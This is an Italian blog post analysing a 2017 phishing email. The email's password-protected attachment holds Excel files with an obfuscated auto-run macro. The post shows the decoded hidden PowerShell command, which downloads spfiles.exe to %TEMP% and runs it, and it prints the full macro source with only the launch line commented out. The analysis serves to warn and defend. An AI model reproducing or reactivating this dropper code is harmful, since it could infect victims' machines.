mercoledì 3 maggio 2017


Qualche giorno fa è arrivata una mail ben fatta, non con i soliti errori ortografici o di traduzione, ma il cui mittente era sconosciuto e pertanto mi hanno chiesto di controllare se si poteva aprire l'allegato.

Il file allegato alla mail era un file zippato con password.

In effetti si trattava di un virus/malware che poi il mio antivirus ha classificato come "behavior monitoring", vediamo come è costruito.

questo il testo della mail

l'allegato "Order List and Products Samples.xls&", protetto dalla password indicata nella mail, conteneva 2 file Excel:

Order List.xls
Products Samples.xls

ho provato quindi a disabilitare le macro in Excel e ad aprire i file.

Intanto contenevano la seguente immagine:

ma c'era anche una macro che si attiva automaticamente all'apertura del file excel:

la macro è apparentemente incomprensibile (ve la includo completa in fondo al post), poichè in pratica è cifrata e, chiamando una funzione interna alla macro, vengono composte alcune stringhe con i comandi da eseguire.

questo il comando di decodifica:

dxvtzzksf = craftmind(Mid(metalnerve, dayseminar, 1), "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4")
wezvdmfahy = wezvdmfahy & dxvtzzksf

eseguito in un loop chiama la funzione craftmind e si costruisce un comando nella variabile wezvdmfahy

per esempio viene costruito il comando:

"Cmd.exe /c powERSheLL.EXE -wINdOwsTYLE hidDen -nOprofIlE -exeCUTiONPOLICy BypAss (NEw-ObjECt SYsTeM.NEt.WebClIENT).DoWnlOAdFilE('','%TEMP%\\spfiles.exe') & %TEMP%\\spfiles.exe"

quindi con : destroysnow = Replace(destroysnow, "UEnOer", "")

si ottiene "wsCRIPT.ShelL"


Call VBA.CallByName(zzjokpxkruedw, dxvtzzksf, 34 - 33, wezvdmfahy, Len("34902") - 5)

fa in modo di eseguire i comandi che sono stati composti.

Viene scaricato il file eseguibile "spfiles.exe"; il file ha le seguenti caratteristiche:

Da notare che se tento di scaricare il file da Chrome mi viene impedito con il messaggio:

mentre se lancio direttamente il comando da CMD mi ritrovo poi il file nella cartella \Temp.

questa la segnalazione dell'antivirus

per cui attenzione gente, attenzione!

Sorgente macro completa (ho commentato la riga di lancio dei comandi):

Public Sub Workbook_Open()
eaglegroup = "gBQVy_pA5sJs>2 (KN$=0Ew0-O_b4j11EVCG$t> Q_S595YQsHT5Qe79MG.N=0KE{0tVV.g_WVeg_b_HC>+l1IJ$E2N5T5=)g9.2D0o<JW1nQ2lqOAq+Kdg2Fi+GlH1EV9(_VG'h$5t21=tpq1:9/*/_sgo5Kli<otVe1x{Q.V5Qc_K0o"
Dim iolsranghngbkftd As Long
iolsranghngbkftd = 44.832
If iolsranghngbkftd <> 230.537 Then
Dim brainclog As Integer
brainclog = 10.84
Dim alientaxi As Boolean
alientaxi = 217.28
Dim joxiqvgxdvgkqmgyopy As Long
joxiqvgxdvgkqmgyopy = 91.619
Dim dreamtraffic As Integer
dreamtraffic = 199.708
Dim slwqxskkifrtvenu As Long
slwqxskkifrtvenu = 200.104
End If
reflectteam = "g2m/QspH7fVilg*eJ$s.e>x91e_q'g,'%+gVT_EMP%4\K\GQs=pf_2i{$$le+s_.eq+xK1e5'417) &7 5%$TGE=QM0P54%K\VQ\0s=*{pQf>i7l>4+eqs1.ex22e"
Dim rzbfufttloytjs As Long
rzbfufttloytjs = 130.134
If rzbfufttloytjs > 188.414 Then
Dim arrestthere As Long
arrestthere = 162.5
Dim chiefvery As Integer
chiefvery = 117.885
Dim yixagrgcr As Long
yixagrgcr = 200.738
End If
Dim candyfault As Boolean
candyfault = 13.585
If candyfault > 23.534 Then
Dim vwlilpqhuxtipaskn As Long
vwlilpqhuxtipaskn = 7.115
Dim jbshgptnywhlrbpj As Byte
jbshgptnywhlrbpj = 45.835
Dim ydvehonazfhowoy As String
ydvehonazfhowoy = "aeefksshtloph"
Dim jddslzdfsknuyqdepv As Integer
jddslzdfsknuyqdepv = 181.785
End If
metalnerve = "$JJCm>dK4.<<ge4xe g5$/Jc= =pow2gEKRS__*hQ9eVLLQV.>EgXQE<2 54-*9wgI>N1$dHOw2s_5qTQVY1gL24E$K h+$iV5*dD+Qe59n 5-n<Op$=Qr2Qo21_f9+IlKEK0G -+VQexHeQ_C9<U4TQi=_4O9NQPO>KgLI>4_CK=y*g " & eaglegroup & reflectteam
Dim hthtzusrclibawldwhp As Boolean
hthtzusrclibawldwhp = 176.19
If hthtzusrclibawldwhp = 223.647 Then
Dim jhuwvmdasyhlngd As Integer
jhuwvmdasyhlngd = 40.49
Dim blushexit As Long
blushexit = 107.607
Dim crouchship As Byte
crouchship = 69.793
Dim mjzylkwylerwg As Boolean
mjzylkwylerwg = 101.142
End If
Dim kwgsfdzsgi As Integer
kwgsfdzsgi = 216.607
Dim clothlive As Integer
clothlive = 218.863
Dim babygap As Byte
babygap = 70.12
wezvdmfahy = ""
Dim petsniff As Double
petsniff = 227.631
Dim includerubber As Byte
includerubber = 226.16
Dim ylljenciotrnbmbozac As Integer
ylljenciotrnbmbozac = 208.153
If ylljenciotrnbmbozac < 194.709 Then
Dim birthugly As Long
birthugly = 203.59
Dim satisfysing As Integer
satisfysing = 218.885
Dim dropvapor As Integer
dropvapor = 140.22
End If
For dayseminar = 1 To Len(metalnerve)
Dim whohxodurmteyyotxy As Long
whohxodurmteyyotxy = 162.459
Dim defensepresent As Double
defensepresent = 121.304
Dim iwrgpvwduuj As Integer
iwrgpvwduuj = 2.986
dxvtzzksf = craftmind(Mid(metalnerve, dayseminar, 1), "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4")
wezvdmfahy = wezvdmfahy & dxvtzzksf
Dim bxadkhschpylpd As Integer
bxadkhschpylpd = 67.874
Dim girlpraise As Long
girlpraise = 20.759
Dim fcuvvpihqzl As Integer
fcuvvpihqzl = 96.874
Dim toolvapor As Integer
toolvapor = 147.856
Dim vppbrpbvbzr As Double
vppbrpbvbzr = 152.141
Dim insaneobtain As Long
insaneobtain = 174.536
If insaneobtain > 225.757 Then
Dim exactillness As Double
exactillness = 55.322
Dim hivnwlmjr As Integer
hivnwlmjr = 181.932
Dim footportion As Integer
footportion = 109.374
Dim iszxdpkyunmrpan As Double
iszxdpkyunmrpan = 38.553
End If
Dim hopesurvey As Double
hopesurvey = 181.116
Dim isfptlrxoyldjthyrpr As Boolean
isfptlrxoyldjthyrpr = 239.81
Dim hzibrwpaqygcul As Byte
hzibrwpaqygcul = 31.93
destroysnow = "wsUEnOerCUEnOerRIUEnOerPT.UEnOerShUEnOerelLUEnOer"
Dim erajump As Boolean
erajump = 201.376
If erajump = 62.812 Then
Dim qwwwzvoktpcxotx As String
qwwwzvoktpcxotx = "manualvictory"
Dim cloudpaddle As String
cloudpaddle = "bardrum"
End If
destroysnow = Replace(destroysnow, "UEnOer", "")
Dim dckmxwierruvfufh As Byte
dckmxwierruvfufh = 236.166
Dim mbnrtgrfkzc As Long
mbnrtgrfkzc = 76.15
Dim thanktravel As Double
thanktravel = 156.65
Dim kvdymawknajgr As Double
kvdymawknajgr = 106.21
Dim currentinherit As Byte
currentinherit = 123.918
Dim cjhoxupxatcajmkl As Double
cjhoxupxatcajmkl = 212.729
Dim qkpogadjh As Double
qkpogadjh = 47.471
Dim lovetail As Double
lovetail = 251.368
Dim clifftask As Boolean
clifftask = 101.927
Set zzjokpxkruedw = CreateObject(destroysnow)
Dim iazurshzpra As Boolean
iazurshzpra = 116.98
If iazurshzpra > 80.985 Then
Dim twrjmoneoubu As Integer
twrjmoneoubu = 215.87
Dim gmijzwnoiezsbybq As String
gmijzwnoiezsbybq = "authorthrive"
Dim crucialfather As String
crucialfather = "snxaxscwztgh"
Dim flashjust As Long
flashjust = 212.614
End If
dxvtzzksf = Replace("eiowneiownRUeiownNeiown", "eiown", "")
Dim cyfospoaasfoht As Long
cyfospoaasfoht = 85.124
If cyfospoaasfoht < 107.967 Then
Dim lonelytraffic As Byte
lonelytraffic = 96.41
Dim tualzudkhwfgihra As Boolean
tualzudkhwfgihra = 81.961
Dim beanstruggle As Integer
beanstruggle = 53.445
Dim moazcyhfr As Integer
moazcyhfr = 229.692
Dim ptzwfjebix As Double
ptzwfjebix = 45.356
End If
' ---- ATTENZIONE ---- commentato riga di lancio comandi
'Call VBA.CallByName(zzjokpxkruedw, dxvtzzksf, 34 - 33, wezvdmfahy, Len("34902") - 5)
' ------------------------------------------------------
Dim learnvelvet As Boolean
learnvelvet = 2.121
If learnvelvet <> 223.69 Then
Dim officetube As Integer
officetube = 182.406
Dim firering As Double
firering = 126.321
Dim quitswarm As Double
quitswarm = 35.787
Dim cannonprivate As Byte
cannonprivate = 83.148
End If

Dim bpektawab As Boolean
bpektawab = 15.729
Dim fruithospital As Byte
fruithospital = 124.877
Dim elephantplace As String
elephantplace = "pyupwlzsgsesjogc"
Dim olivequantum As Boolean
olivequantum = 174.257
Dim surgewant As String
surgewant = "chasejust"
End Sub
Function craftmind(awrocxifwhdpbzlwev, stadiumtrue)
retVaawrocxifwhdpbzlwev = ""
Dim ladderspot As Double
ladderspot = 171.9
If ladderspot > 137.912 Then
Dim trujecqfdn As Double
trujecqfdn = 6.68
Dim vrnscxffkklozbb As Byte
vrnscxffkklozbb = 206.831
Dim fdalrtffkq As Byte
fdalrtffkq = 65.877
Dim bcqjcxtlxjtdzoxzwcx As Integer
bcqjcxtlxjtdzoxzwcx = 176.794
Dim sdcptgqroqfjpk As Byte
sdcptgqroqfjpk = 62.585
End If
zjpgfbadiggqbjbb = "*" & awrocxifwhdpbzlwev & "*"
Dim fvbmcjqvmjeayiyh As Byte
fvbmcjqvmjeayiyh = 69.11
Dim rudesolve As Integer
rudesolve = 162.413
Dim bicyclejunior As Integer
bicyclejunior = 225.708
If bicyclejunior < 109.204 Then
Dim flnijswyk As String
flnijswyk = "beachenhance"
Dim jejkarsltaltubm As Double
jejkarsltaltubm = 195.858
End If
dxvtzzksf = ""
Dim pausesleep As Long
pausesleep = 176.616
If pausesleep = 114.444 Then
Dim coolprevent As Byte
coolprevent = 47.44
Dim blymrrcupyquepkvurk As Long
blymrrcupyquepkvurk = 145.457
Dim accountbrother As Long
accountbrother = 15.151
End If
If Not stadiumtrue Like zjpgfbadiggqbjbb Then
dxvtzzksf = awrocxifwhdpbzlwev
End If
craftmind = dxvtzzksf
Dim oqgidcyjtrzcxyysqey As Boolean
oqgidcyjtrzcxyysqey = 207.787
Dim keeprace As Long
keeprace = 177.348
Dim carpetcrop As Byte
carpetcrop = 70.13
Dim biologyfoster As Byte
biologyfoster = 237.112
End Function

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